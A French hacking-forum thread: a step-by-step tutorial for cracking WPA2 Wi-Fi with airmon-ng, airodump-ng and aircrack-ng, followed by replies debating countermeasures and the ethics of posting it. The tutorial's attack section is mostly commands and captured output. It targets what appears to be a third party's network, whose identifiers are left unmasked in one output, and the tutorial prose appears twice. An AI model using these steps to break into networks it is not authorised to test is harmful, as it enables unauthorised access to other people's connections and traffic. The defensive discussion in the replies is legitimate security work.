[HowTo] Cracker un réseau WPA2
Salut
Comme vous le savez, je ne suis ni programmeur de renommée ni hacker recherché. Cependant, les attaques contre les réseaux Wi-Fi, ça me parle. Je vous montre donc quelques résultats et informations que j'ai récoltés au fil du temps.
Tout se passe sous BackTrack (version 5 R3). Pour une performance accrue, j'utilise mon ordinateur fixe. Puisqu'il n'a pas de carte réseau sans-fil, je me suis acheté un bon truc à 15$: $link$
On initialise d'abord l'interface wlan0:
Puis, on se renseigne sur les réseaux environnants:
On obtient alors une liste de tous les AP ainsi que les terminaux qui y sont connectés: (j'ai masqué certaines informations avec des $$)
Le but étant d'obtenir le handshake lors d'une connexion d'un terminal à l'AP, on optera pour une surveillance des réseaux "bondés". Dans ce cas, l'AP dont le MAC est 00:$$:E3:$$:64:$$ semblerait optimal. Il ne l'est en fait pas, puisqu'après une longue surveillance on s'aperçoit qu'il n'y a qu'un client de connecté et un flot de données discontinu. On veut pouvoir attraper les utilisateurs qui se connectent, pas ceux qui sont connectés. On choisit alors l'AP avec le MAC 64:$$7:$$:47:$$.
On utilise toujours airodump, mais cette fois on restreint son champ d'analyse.
Les arguments sont les suivants:
-c -> canal radio de l'AP
--bssid -> adresse MAC de l'AP
-w -> préfixe de l'output (.cap si format non défini)
On se retrouve alors avec ceci:
Manque de bol, aucun utilisateur ne s'est connecté. Il faudra donc laisser le programme tourner quelques heures, voire quelques jours. Puisque cela prend forcément du temps, on va se mettre à analyser d'autres réseaux. Je vous déconseille fortement de faire cela à moins que vous ayez une carte réseau par AP "sniffé". En effet, l'antenne devra jongler entre deux canaux (ou plus) et peut alors potentiellment manquer un handshake.
Une fois le handshake trouvé, vous le verrez en haut à droite de la page: (fait sur mon propre réseau cette fois, car l'autre ne coopérait pas)
Notez que le handshake n'apparaît uniquement lorsqu'un appareil inconnu se connecte (et entre alors le mot de passe). C'est précisément à ce moment-là que la négociation (de la clef ?) a lieu. Si un appareil connu (avec mot de passe déjà enregistré) se connecte, vous n'aurrez pas le handshake.
Une fois le handshake en main, on peut procéder au crack:
À nouveau, les arguments sont les suivants:
-a -> mode de crack (1 pour WEP, 2 pour WPA(2))
-b -> adresse MAC de l'AP
-l -> nom et format du fichier output (la clef)
-w -> chemin de la wordlist
On peut voir qu'aircrack teste une à une toutes les clefs de la wordlist. J'ai préféré utiliser mon ordinateur fixe car son taux de test (~5900 clefs/sec) est bien plus important que celui d'un portable, par exemple. Étant donné que l'on ne peut pas vraiment combler ce manque sur un portable, j'ai pensé à une certaine méthodologie:
1) Enregistrer l'output d'airodump sur un ordinateur distant en spécifiant un chemin réseau (envoyer le tout via Internet sera trèèès long)
2) Exécuter aircrack sur la même machine distante en spécifiant l'output vers le portable
L'idéal serait un accès SSH ou autre. Overclocker le CPU aide grandement. De plus, les CPUs hautement multi-threads seront avantagés (j'ai 6C/12T ici).
Puisque la wordlist n'est pas optimale pour la clef de mon AP, aircrack ne la trouvera probablement jamais. C'est pourquoi le choix de la wordlist est très important quand à l'obtention du mot de passe d'un AP. Vous pouvez générer toutes les possibilités de min-maj-num jusqu'à 16 caractères mais bonjour l'espace disque gaspillé. C'est pourquoi il faut faire une wordlist à base de mots (vbtrTdbbr%2+ est assez dur à mémoriser, comparé à djeanwifi251076). Je pense que trouver la bonne wordlist est plus dur que trouver le handshake (relativement simple, il suffit d'un peu de patience).
En ce qui concerne la création de worlists, crunch (Linux) et L517 (Windows) font très bien leur boulot. Le premier est plus complet à mes yeux. Une bonne explication de son fonctionnement: http://adaywithtape.blogspot.ch/2011/05/...h-v30.html
Bref, voilà comment ça se présente pour cracker du WPA.
Comme vous le savez, je ne suis ni programmeur de renommée ni hacker recherché. Cependant, les attaques contre les réseaux Wi-Fi, ça me parle. Je vous montre donc quelques résultats et informations que j'ai récoltés au fil du temps.
Tout se passe sous BackTrack (version 5 R3). Pour une performance accrue, j'utilise mon ordinateur fixe. Puisqu'il n'a pas de carte réseau sans-fil, je me suis acheté un bon truc à 15$: $link$
On initialise d'abord l'interface wlan0:
Code :
ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng stop mon0
Puis, on se renseigne sur les réseaux environnants:
Code :
airodump-ng wlan0
On obtient alors une liste de tous les AP ainsi que les terminaux qui y sont connectés: (j'ai masqué certaines informations avec des $$)
Code :
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:$$:E3:$$:64:$$ -26 183 15982 0 6 54e. WPA2 CCMP PSK $$$
64:$$:D7:$$:47:$$ -52 287 32 0 1 54e WPA2 CCMP PSK $$$
80:$$:AB:$$:00:$$ -54 214 5 0 11 54e WPA2 CCMP PSK $$$
AC:$$:0B:$$:CD:$$ -65 169 0 0 4 54e WPA2 CCMP PSK $$$
24:$$:11:$$:42:$$ -67 247 1 0 1 54e. WPA2 CCMP PSK $$$
00:$$:C9:$$:7C:$$ -67 246 70 0 1 54e WPA2 CCMP PSK $$$
00:$$:A6:$$:C9:$$ -70 311 297 0 8 54 . OPN $$$
00:$$:A6:$$:CA:$$ -72 39 610 0 4 54 . OPN
$$$
BSSID STATION PWR Rate Lost Frames Probe
80:$$:AB:$$:00:$$ 00:$$:20:$$:BC:$$ -54 36e- 1e 0 47 $$$
80:$$:AB:$$:00:$$ 18:$$:96:$$:B5:$$ -74 1e- 1 0 37
24:$$:11:$$:42:$$ C4:$$:FE:$$:2B:$$ -74 1e- 1 0 10 $$$
00:$$:A6:$$:C9:$$ 98:$$:F7:$$:7E:$$ -1 1 - 0 0 26
00:$$:A6:$$:CA:$$ 38:$$:3C:$$:3D:$$ -1 1 - 0 0 4
00:$$:A6:$$:CA:$$ 84:$$:88:$$:14:$$ -1 11 - 0 0 1
00:$$:A6:$$:CA:$$ 98:$$:82:$$:A9:$$ -1 5 - 0 0 44
00:$$:A6:$$:CA:$$ 00:$$:04:$$:18:$$ -1 5 - 0 0 48
Le but étant d'obtenir le handshake lors d'une connexion d'un terminal à l'AP, on optera pour une surveillance des réseaux "bondés". Dans ce cas, l'AP dont le MAC est 00:$$:E3:$$:64:$$ semblerait optimal. Il ne l'est en fait pas, puisqu'après une longue surveillance on s'aperçoit qu'il n'y a qu'un client de connecté et un flot de données discontinu. On veut pouvoir attraper les utilisateurs qui se connectent, pas ceux qui sont connectés. On choisit alors l'AP avec le MAC 64:$$7:$$:47:$$.
On utilise toujours airodump, mais cette fois on restreint son champ d'analyse.
Code :
airodump-ng -c 1 --bssid 64:$$:D7:$$:47:$$ -w psk wlan0
Les arguments sont les suivants:
-c -> canal radio de l'AP
--bssid -> adresse MAC de l'AP
-w -> préfixe de l'output (.cap si format non défini)
On se retrouve alors avec ceci:
Code :
CH 1 ][ Elapsed: 6 mins ][ 2013-11-16 17:58 ][ fixed channel wlan0: 13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:87:D7:02:47:59 -51 4 681 53 0 1 54e WPA2 CCMP PSK oso-4998
BSSID STATION PWR Rate Lost Frames Probe
Manque de bol, aucun utilisateur ne s'est connecté. Il faudra donc laisser le programme tourner quelques heures, voire quelques jours. Puisque cela prend forcément du temps, on va se mettre à analyser d'autres réseaux. Je vous déconseille fortement de faire cela à moins que vous ayez une carte réseau par AP "sniffé". En effet, l'antenne devra jongler entre deux canaux (ou plus) et peut alors potentiellment manquer un handshake.
Une fois le handshake trouvé, vous le verrez en haut à droite de la page: (fait sur mon propre réseau cette fois, car l'autre ne coopérait pas)
Code :
CH 13 ][ Elapsed: 48 mins ][ 2013-11-16 18:01 ][ WPA handshake: 00:$$:F6:$$:B5:$$
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:$$:F6:$$:B5:$$ -40 1 2216 16952 3 13 54e. WPA2 CCMP PSK SAFIR
BSSID STATION PWR Rate Lost Frames Probe
00:$$:F6:$$:B5:$$ 04:$$:95:$$:CC:$$ -127 0e- 0e 0 15487
00:$$:F6:$$:B5:$$ AC:$$:0B:$$:CA:$$ -127 0e- 0e 263 1145
00:$$:F6:$$:B5:$$ AC:$$:0B:$$:CA:$$ -127 1e- 0 708 1375
Notez que le handshake n'apparaît uniquement lorsqu'un appareil inconnu se connecte (et entre alors le mot de passe). C'est précisément à ce moment-là que la négociation (de la clef ?) a lieu. Si un appareil connu (avec mot de passe déjà enregistré) se connecte, vous n'aurrez pas le handshake.
Une fois le handshake en main, on peut procéder au crack:
Code :
aircrack-ng -a 2 -b 00:$$:F6:$$:B5:$$ -l key.txt -w /media/Data/18_in_1.lst /root/psk-01.cap
À nouveau, les arguments sont les suivants:
-a -> mode de crack (1 pour WEP, 2 pour WPA(2))
-b -> adresse MAC de l'AP
-l -> nom et format du fichier output (la clef)
-w -> chemin de la wordlist
Code :
Aircrack-ng 1.1 r2178
[00:00:09] 57144 keys tested (5881.08 k/s)
Current passphrase: 121212poohbear
Master Key : 94 52 0A 5A 45 8A 20 4A 13 7B C2 62 8A 1C BF 89
53 A2 BB 4B 96 9E BD FF 64 92 4D 3D 8B 11 D9 F9
Transient Key : 48 76 A2 87 B0 38 E1 02 81 A5 82 04 2E 57 09 21
CB ED 2C 86 67 9A D6 E2 08 9B 60 7C 22 5E 82 28
2D 8A 16 35 3B B3 49 00 73 48 A2 E7 2F 28 61 B1
90 59 02 70 7E 96 A3 C2 AF 66 C0 E6 C1 35 F0 0A
EAPOL HMAC : E7 5B 6C 1D D0 D5 15 9B C3 D2 5D B2 4D DF 90 DC
On peut voir qu'aircrack teste une à une toutes les clefs de la wordlist. J'ai préféré utiliser mon ordinateur fixe car son taux de test (~5900 clefs/sec) est bien plus important que celui d'un portable, par exemple. Étant donné que l'on ne peut pas vraiment combler ce manque sur un portable, j'ai pensé à une certaine méthodologie:
1) Enregistrer l'output d'airodump sur un ordinateur distant en spécifiant un chemin réseau (envoyer le tout via Internet sera trèèès long)
2) Exécuter aircrack sur la même machine distante en spécifiant l'output vers le portable
L'idéal serait un accès SSH ou autre. Overclocker le CPU aide grandement. De plus, les CPUs hautement multi-threads seront avantagés (j'ai 6C/12T ici).
Puisque la wordlist n'est pas optimale pour la clef de mon AP, aircrack ne la trouvera probablement jamais. C'est pourquoi le choix de la wordlist est très important quand à l'obtention du mot de passe d'un AP. Vous pouvez générer toutes les possibilités de min-maj-num jusqu'à 16 caractères mais bonjour l'espace disque gaspillé. C'est pourquoi il faut faire une wordlist à base de mots (vbtrTdbbr%2+ est assez dur à mémoriser, comparé à djeanwifi251076). Je pense que trouver la bonne wordlist est plus dur que trouver le handshake (relativement simple, il suffit d'un peu de patience).
En ce qui concerne la création de worlists, crunch (Linux) et L517 (Windows) font très bien leur boulot. Le premier est plus complet à mes yeux. Une bonne explication de son fonctionnement: http://adaywithtape.blogspot.ch/2011/05/...h-v30.html
Bref, voilà comment ça se présente pour cracker du WPA.
gruik
gouteur de savon Messages : 757 Sujets : 44 Points: 482 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
w00t merci pour ce tuto sur comment font les pirates, sinon du coté white hat de la chose on a quoi comme solutions pour empêcher ça ? ça peut faire l'objet d'un tuto aussi ?
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure. Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément. (Nicolas Boileau, L'Art poétique) |
Kiwazaru
Padawan d'un super escargot Messages : 284 Sujets : 26 Points: 139 Inscription : Mar 2012 |
RE: [HowTo] Cracker un réseau WPA2
Il serait bien de faire une lexique de tous les termes que tu emplois dans ton paper. Si on n'est pas familier avec tous ces termes, je pense qu'on y est vite perdu
Sinon oui, il serait intéressant d'avoir un avis sur la sécurisation/mise en place de protection contre cette attaque
Toucher au Kernel, c'est un peut comme se shooter au LSD, on pense pouvoir tout faire mais ça finit souvent mal.
|
Loup
Membre actif Messages : 85 Sujets : 8 Points: 8 Inscription : Sep 2013 |
RE: [HowTo] Cracker un réseau WPA2
Salut gruik, je décide de te répondre pour repartir sur de bonnes bases avec toi (^_^)
Premièrement, la chose que personne ne fait, mais que tout le monde doit faire... Changer le mot de passe de connexion au routeur! (pour ceux qui ne comprennent pas là où je veux en venir: http://i.imgur.com/6jaSToz.png) Cela évitera à quelqu'un de connecté sur ta box, de changer certains paramètres qui te feront bien chier par la suite. Secondement, comme on le vois, une attaque par "wordlist" est effectuée c'est à dire que si le mot de passe que tu as choisi n'est pas dans ce wordlist, il ne pourra bien évidemment pas être cracké. Les modes WPA/WPA2 proposent ces 3 longueurs: - WPA - 64-bit - 8 Characters - WPA2 - 160-bit - 20 Characters - WPA2 - 504-bit - 63 Characters Ce qui donne une clé de ce genre en HEX: 6C215A4533456E3544634A6567364C6C26473033476150723075575E434A4268565439727253612B57566B6739483726726D52416758372A3D54734B244D4D On voit tout de suite que c'est plus sécurisé qu'un WPA du type: 66F9252255FAE25D55C799E766 tout dépend aussi du mot de passe en ascii que vous entrez c'est sur qu'un buffer overflow de 0x41 un wordlist peut le contenir :) Dernier point que j'aborde ici pour ne pas partir trop loin (ce n'est pas un tutoriel hein :p) -Cacher son ssid! Je vous laisse deviner pourquoi :'=) Dernièrement je voudrais finaliser tout ceci avec le simple fait qu'une attaque de ce genre est impossible à moins d'être déjà connecté sur la victime ( la capture de paquet est impossible) , ce qui ne sert complétement à rien :) (sauf si on a eu recours au social engineering) (16-11-2013, 21h50)Loup a écrit : Salut gruik, je décide de te répondre pour repartir sur de bonnes bases avec toi (^_^) |
c4ffein
Membre Messages : 49 Sujets : 2 Points: 5 Inscription : Jul 2013 |
RE: [HowTo] Cracker un réseau WPA2 |
gruik
gouteur de savon Messages : 757 Sujets : 44 Points: 482 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
(16-11-2013, 23h32)c4ffein a écrit : Il essaye de cracker le password avec une wordlist, pour "sécuriser" une longue chaine aléatoire suffit, pas besoin d'un tuto oui oui j'entends bien mais c'était surtout pour mettre un peu l'accent sur le coté "white hat" inhérent à n-pn et l'occasion d'une réflexion rapide sur tout ça quant à faire un tuto je suis d'accord qu'en l'occurrence il n'y a probablement pas de quoi faire, les attaques sur WPA/WPA2 n'ont pas évolué d'un iota depuis plus de 5 ans et la sécurité du wifi, hors mot de passe, repose sur le design et l’implémentation des "box" diverses, lesquelles sont par défaut relativement bien sécurisées désormais sans parler des efforts un peu partout de communication sur le sujet donc concrètement on parle d'un "hacking" qui consiste à tomber sur un pigeon qui aura choisi un mot de passe faible ou dont la box est toujours la même depuis 10 ans et carbure toujours au WEP, sans être bégueule il s'agit tout de même d'être conscient de ce que l'on fait, un peu comme si l'on écrivait des tutos sur comment repérer les pigeons à racketter Citation :"choisissez bien votre cible, préférez des personnes vêtues de manteaux amples avec de grandes poches, les femmes seules avec une poussette sont des cibles idéales car elles ne vous courront pas après si vous vous faites gauler..." il y a 15 ans de ça on expliquait à qui voulait l'entendre que "pour pouvoir combattre les pirates il faut penser comme eux", nul doute que le propos est toujours le même, pas vrai ? heureusement on est au sein d'une communauté de hackers white-hat et notre soif d'apprendre des choses intelligentes nous pousse à nous poser des questions qui vont plus loin que ces pirates à 2 balles d'Anonymous, la différence c'est que nous quand on parle de comment pirater on sait comment ça fonctionne en dessous n'est-ce pas, la tête des protocoles 802.11x, le chiffrement utilisé, le modèle de crypto employé etc. dès lors on pourrait se poser tout un tas de questions du genre : * vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ? * quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ? * si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ? * serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ? * etc. finalement au delà de l'éthique personnelle, la seule limite est l'imagination non ?
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure. Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément. (Nicolas Boileau, L'Art poétique) |
b0fh
Membre actif Messages : 210 Sujets : 17 Points: 309 Inscription : Jul 2012 |
RE: [HowTo] Cracker un réseau WPA2
Citation :-Cacher son ssid! Je dois être un peu bête, mais j'ai de la peine à comprendre en quoi c'est une bonne idée. Sachant que le SSID est diffusé en clair dans chaque trame, ça n'apporte donc absolument aucune sécurité, en revance ça force le client a lancer des requêtes d'association dans le vide, et offre donc une opportunité supplémentaire d'attaquer le client avec un faux AP. Qu'est-ce qui est le plus dangereux, se faire utiliser sa connexion internet à son insu, ou se faire MITM ses machines ? |
Serphentas
Thall Messages : 41 Sujets : 10 Points: 29 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
Pour contrer ce genre d'attaque, on doit se munir d'un bon mot de passe (et éviter le Wi-Fi Protected Setup).
Pour calculer le nombre de possibilités à tester pour retrouver votre mot de passe, essayez ceci: 2^n où n=(log(x)/log(2)*k) n correspond à l'entropie de votre mot de passe. Plus il est élevé, plus il faudra tester de combinaisons. On divise en général le 2^n par 2, puisqu'on teste rarement toutes les possibilités. Convertissez ensuite ce résultat en minutes, heures, jours, années... suivant la vitesse d'essai (x mots de passe/sec). Puisque k est un coefficient, privilégiez un mot de passe long. Évitez aussi les mots et/ou phrases, puisqu'une wordlist de mots est plus rapidement faite qu'une à base de caractères random. Comme dit plus haut, ne pas émettre (broadcast) son (E)SSID est utile pour que les gens "normaux" ne voient pas votre réseau. Par contre, un pirate muni de la suite airecrack ne sera pas désavantagé puisqu'il n'a pas besoin de l'(E)SSID. Cela peut néanmoins l'éloigner s'il ne fait pas une recherche approfondie des réseaux environnants. Quant aux mots utilisés **suite** Quant au vocabulaire, je mets ici en attendant une future modification: MAC: Media Access Control, c'est l'adresse (unique) matérielle d'une carte réseau AP: Access Point, ou point d'accès (Wi-Fi) sniff: littéralement renifler, le fait d'écouter les données et informations qui passent handshake: négociation, c'est un transit de données fait en vu de l'établissement d'une connexion/lien de communication (ici: radio) Pour répondre à gruik: * vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ? => Couper le Wi-Fi ? Si oui, j'aimerais bien ! Je m'en passerais volontiers mais mon téléphone n'as malheureusement pas (encore) de prise Ethernet. * quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ? => Voir la première partie de mon post * si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ? => Si tu regardes les logs de ton router (ou que tu analyses les clients connectés à ton AP avec airodump), tu peux rapidement voire quel est le client qui n'a pas une adresse MAC connue. C'est-à-dire, tu peux vérifier les adresss MAC de tes appareils et bannir celle que tu ne connais pas (via le routeur). * serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ? => Tu peux tout à fait scripter tout ça, de telle sorte à ce que ça trouve un bon AP, le sniff, trouve son handshake et parte faire un crack. Enfin: Qu'est-ce qui est le plus dangereux, se faire utiliser sa connexion internet à son insu, ou se faire MITM ses machines ? => Tout est dangereux. Un inconnu qui télécharge du pr0n -18 avec ta connexion et tu diras bonjour à la police. Avec un MITM tu te fais choper des informations sensibles. |
Loup
Membre actif Messages : 85 Sujets : 8 Points: 8 Inscription : Sep 2013 |
RE: [HowTo] Cracker un réseau WPA2
@b0fh
Comme l'a très bien dit Serphentas, c'est utile contre les utilisateurs lambda. Mais cacher son SSID n'est pas si une bonne idée que ça en y réfléchissant (je me contredis là :p) quelqu'un pourrait très bien utiliser un rogue AP à l’insu d'autres utilisateurs... M'enfin, cacher son SSID ne sert pas à grand chose, c'est juste une "mini-protection" contre les petits-joueurs Arf, je viens de relire ton post et je re-dis un peu tout ce que tu as dit :'=) |
b0fh
Membre actif Messages : 210 Sujets : 17 Points: 309 Inscription : Jul 2012 |
RE: [HowTo] Cracker un réseau WPA2
Pardon, mais a l'heure ou n'importe quel mongolien peut installer un sniffer tout automatique sur son smartphone, ton SSID caché ne t'apporte strictement zéro, zilch, nada, que d'alle, néant total, absolument aucune sécurité supplémentaire par rapport a un mot de passe.
A propos de l'entropie: Citation :2^n où n=(log(x)/log(2)*k)est juste une manière inutilement compliquée d'écrire x^k, ou x est la taille de l'alphabet et k la longueur, les noms sont bizarres. Quoi qu'il en soit, ça n'a pas de sens de parler d'entropie d'un mot de passe particulier (l'entropie d'une donnée connue est nulle), c'est une borne maximum sur l'entropie vue par un attaquant qui suppose une distribution aléatoire équiprobable des mots de passe. Et pour ce qui est du danger des attaques... en te MITMisant on peut aussi remplir le cache de ton navigateur avec du pedopr0n, et tu ne pourras pas invoquer un défaut de sécurisation de ta connexion internet. Cet argument ne tient pas. |
Ant4rt1c
Membre Messages : 27 Sujets : 1 Points: -1 Inscription : Oct 2013 |
RE: [HowTo] Cracker un réseau WPA2
Citation :Dernièrement je voudrais finaliser tout ceci avec le simple fait qu'une attaque de ce genre est impossible à moins d'être déjà connecté sur la victime ( la capture de paquet est impossible) , ce qui ne sert complétement à rien je ne m'y connais pas encore très bien en réseau et je ne suis pas sur de comprendre ton commentaire. Tu veux dire qu'on ne peut pas savoir si un nouvel utilisateur se connecte a la box si on y est pas connecté ? |
gruik
gouteur de savon Messages : 757 Sujets : 44 Points: 482 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 00h55)Serphentas a écrit : Pour répondre à gruik: ouai, c'était un ensemble de questions non-exhaustif plus destiné à faire réfléchir qu'à assouvir réellement ma curiosité personnelle en fait Citation :* vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ? => Couper le Wi-Fi ? Si oui, j'aimerais bien ! Je m'en passerais volontiers mais mon téléphone n'as malheureusement pas (encore) de prise Ethernet. sans parler couper le wifi on pourrait envisager de détecter le sniffing peut-etre comme on peut le faire sur Ethernet ? ensuite un AP qui recevrait un rejeu massif -puisque c'est de ça qu'il s'agit- de paquets dans un laps de temps relativement court pourrait probablement être détecté comme étant un attaquant et en guise de contre-mesure renvoyer des paquets avec des fake IV par exemple Citation :* quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ? => Voir la première partie de mon post ok mettons que le sujet lui-même doit pouvoir occasionner un article/tutoriel à part, celui de la stratégie des mots de passe, et qui serait un peu plus étoffé qu'une seule ligne perdue dans un tuto Citation :* si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ? => Si tu regardes les logs de ton router (ou que tu analyses les clients connectés à ton AP avec airodump), tu peux rapidement voire quel est le client qui n'a pas une adresse MAC connue. C'est-à-dire, tu peux vérifier les adresss MAC de tes appareils et bannir celle que tu ne connais pas (via le routeur). bannir sur l'adresse MAC c'est un peu comme bannir un browser sur son user-agent finalement, c'est d'ailleurs souvent la première chose qu'on fait de modifier son adresse MAC, sachant que selon la box le propos est de prendre précisément la MAC du client légitime pour tromper l'association qui est faite, bannir l'adresse MAC revient à se couper les noix tout seul dans ce cas ce serait pas vraiment judicieux Citation :* serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ? => Tu peux tout à fait scripter tout ça, de telle sorte à ce que ça trouve un bon AP, le sniff, trouve son handshake et parte faire un crack. yep, là encore merci de me confirmer que c'est possible, c'est précisément ce sur quoi je voulais attirer l'attention je me dis qu'un article autour d'un ptit code perso qui par exemple lirait en temps réel le log de connexion du routeur comme tu disais, ou tenterait de découvrir des machines sur le réseau à l'aide de {nmap,hping,tshark,scapy,zob,...} et le cas échéant remonterait une alerte sous forme d'un popup (...) serait finalement tout aussi intéressant qu'un tuto sur comment utiliser aircrack-ng pour pirater son voisinage
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure. Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément. (Nicolas Boileau, L'Art poétique) |
c4ffein
Membre Messages : 49 Sujets : 2 Points: 5 Inscription : Jul 2013 |
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 02h40)gruik a écrit : sans parler couper le wifi on pourrait envisager de détecter le sniffing peut-etre comme on peut le faire sur Ethernet ?La il crack sans injection de packet a ce que j'ai compris, non? |
gruik
gouteur de savon Messages : 757 Sujets : 44 Points: 482 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 20h44)c4ffein a écrit : La il crack sans injection de packet a ce que j'ai compris, non? oui, au temps pour moi je me suis mélangé les pinceaux reste que ce serait potentiellement encore plus facile à détecter du coup...
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure. Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément. (Nicolas Boileau, L'Art poétique) |
Serphentas
Thall Messages : 41 Sujets : 10 Points: 29 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 02h40)gruik a écrit :(17-11-2013, 00h55)Serphentas a écrit : Pour répondre à gruik: (17-11-2013, 20h44)c4ffein a écrit : La il crack sans injection de packet a ce que j'ai compris, non?Je n'injecte aucun paquet, en effet. Par contre, j'aurais pu faire un passage sur la dé-authentification d'un client (qui se fait via l'envoi de paquet DeAuth). |
c4ffein
Membre Messages : 49 Sujets : 2 Points: 5 Inscription : Jul 2013 |
RE: [HowTo] Cracker un réseau WPA2 |
levur
Membre Messages : 27 Sujets : 3 Points: 10 Inscription : Sep 2013 |
RE: [HowTo] Cracker un réseau WPA2
Certaine box permette de faire une white liste des MAC
Après tu peux scripter un tool qui te previens a chaque connexion d'une new carte réseau est la tu check Citation :Staline a hérité d'une Russie à la charrue, et l'a laissée avec l'arme atomique,Churchill 1959 Chambre des Communes |
gruik
gouteur de savon Messages : 757 Sujets : 44 Points: 482 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
(18-11-2013, 14h22)c4ffein a écrit : Comment tu veux detecter une carte qui n'emet pas? ben la carte émet bien des paquets puisqu'elle réalise un bruteforce, on parle de détecter par exemple 5 ou 10 essais invalides, directement au niveau de l'AP (envisager des contre-mesures efficaces à implémenter directement sur la "box" si tu préfères) quant à détecter un élément passif (== qui n'émet pas, une carte réseau en train de sniffer typiquement) c'est possible au niveau 2, au niveau 1 en revanche (quand la carte n'a pas encore rejoint le réseau wi-fi) j'en doute mais encore une fois c'était des questions lancées un peu au hasard pour illustrer mon propos principal qui était de dire qu'un tuto qui explique comment pirater c'est bien, mais se poser des questions sur comment contrer les techniques de piratage sur un forum taggé "white hat hacking" c'est quand même mieux, et que ça devrait théoriquement être la finalité de tout un chacun
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure. Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément. (Nicolas Boileau, L'Art poétique) |
Serphentas
Thall Messages : 41 Sujets : 10 Points: 29 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
C'est vrai que sans contre-mesure ce tuto est un peu décalé, ici, maintenant que j'y pense... Possible de donner une suite à un modérateur pour qu'il la rajoute au 1er post ?
|
c4ffein
Membre Messages : 49 Sujets : 2 Points: 5 Inscription : Jul 2013 |
RE: [HowTo] Cracker un réseau WPA2
@gruik : c'etait une question rethorique.. enfin bref
(19-11-2013, 01h08)gruik a écrit : ben la carte émet bien des paquets puisqu'elle réalise un bruteforce, on parle de détecter par exemple 5 ou 10 essais invalides, directement au niveau de l'AP (envisager des contre-mesures efficaces à implémenter directement sur la "box" si tu préfères)Non, il bruteforce le handshake sur son pc (19-11-2013, 01h08)gruik a écrit : quant à détecter un élément passif (== qui n'émet pas, une carte réseau en train de sniffer typiquement) c'est possible au niveau 2, au niveau 1 en revanche (quand la carte n'a pas encore rejoint le réseau wi-fi) j'en douteVoila, tu peux pas detecter une carte en mode monitor (19-11-2013, 01h08)gruik a écrit : mais encore une fois c'était des questions lancées un peu au hasard pour illustrer mon propos principal qui était de dire qu'un tuto qui explique comment pirater c'est bien, mais se poser des questions sur comment contrer les techniques de piratage sur un forum taggé "white hat hacking" c'est quand même mieux, et que ça devrait théoriquement être la finalité de tout un chacunHonnetement, il peut y avoir marquer white/black/rainbow hat, au final c est juste des infos techniques qui peuvent etre utiliser pour faire le "bien" comme le "mal". Apres on peut reprocher que ce soit un tuto qui explique en detail comment mener une attaque et pas un cours sur les securites du wifi. |
gruik
gouteur de savon Messages : 757 Sujets : 44 Points: 482 Inscription : Oct 2012 |
RE: [HowTo] Cracker un réseau WPA2
(19-11-2013, 14h41)c4ffein a écrit : Non, il bruteforce le handshake sur son pc (...) tu peux pas detecter une carte en mode monitor au temps pour moi (19-11-2013, 14h41)c4ffein a écrit : Honnetement, il peut y avoir marquer white/black/rainbow hat, au final c est juste des infos techniques (...) je te remercie de ton honnêteté, il ne s'agit donc pas de reprocher mais bel et bien d'"attirer l'attention sur", le bienfondé ou l'orientation des infos techniques relevant de l'avis des modérateurs, à l'instar de n'importe quel autre site
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure. Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément. (Nicolas Boileau, L'Art poétique) |
c4ffein
